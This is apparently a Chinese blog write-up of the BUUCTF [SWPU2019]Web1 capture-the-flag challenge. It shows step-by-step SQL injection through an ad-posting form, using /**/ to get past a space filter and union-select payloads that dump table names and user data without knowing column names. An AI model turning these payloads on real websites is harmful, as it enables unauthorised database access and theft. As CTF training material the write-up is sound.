当前位置: 首页 > news >正文

146,[1] BUUCTF WEB [SWPU2019]Web1

进入靶场

先注册

试着发一个

看看源代码

 所以上传的广告应该是注入点

再上传看看

历史记录里有SQL语句,那就试试

被过滤了

从基本的开始试试

报错了

是单引号闭合

尝试看看过滤了什么

我尝试的1和空格以及1空格2,但是发现最后空格没有出现

猜测第一次传入的sql语句也没有正确传入

 

 

不过%23可以 

 

先把空格和#替换掉 

 

在union select后半部分报错了

那就先只用union select找注入点

多尝试了几次发现用()解决过滤了空格的方法行不通

用/**/

没闭合

用注释符不行

那就闭合

 1'/**/union/**/select/**/1,2'

 

I fu le

 1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

找到注入点了

1'/**/union/**/select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22' 

 

1'/**/union/**/select/**/1,database(),group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/mysql.innodb_table_stats/**/where/**/database_name="web1"' 

 

1'/**/union/**/select/**/1,database(),(select/**/group_concat(b)/**/from/**/(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

 

 

相关文章:

  • Python的imutils库详细介绍
  • Linux(socket网络编程)UDP---初学
  • nacos学习笔记
  • DeepSeek-R1:通过强化学习激励大型语言模型的推理能力
  • 【LeetCode】3.无重复字符的最长字串
  • Qt中基于开源库QRencode生成二维码(附工程源码链接)
  • Mac 开发工具推荐
  • 《云原生安全攻防》-- K8s镜像安全:镜像全生命周期安全管理
  • 深入解析类方法与静态方法 —— 内存分析与直观图示详解
  • 项目访问出现504 Gateway Time-out nginx/1.21.6的情况
  • 注册表单提交加验证码功能
  • 服务器租用:虚拟化技术都包含哪些内容?
  • 2025年2月9日(数据分析_2)
  • Spring AI发布!让Java紧跟AI赛道!
  • ailx10的发明专利思路
  • HDFS体系结构
  • 【深度学习】深度学习和强化学习算法——深度 Q 网络DQN
  • 【SQL SERVER】sqlserver 该表字段如果被用作其他表的外键不能被truncate table
  • 掌握xtquant实时行情订阅:量化交易的关键一步
  • 强化学习笔记7——DDPG到TD3
  • 遭“特朗普关税”冲击,韩国今年经济增长预期“腰斩”降至0.8%
  • “典孝急乐批麻蚌赢”:互联网“八字真言”与当代赛博赢学
  • SIFF动画单元公布首批片单:《燃比娃》《凡尔赛玫瑰》等
  • 2025上海科技节本周六启幕,机器人和科学家同走AI科学红毯
  • 商务部召开外贸企业圆桌会:全力为外贸企业纾困解难,提供更多支持
  • 上海现有超12.3万名注册护士,本科及以上学历占一半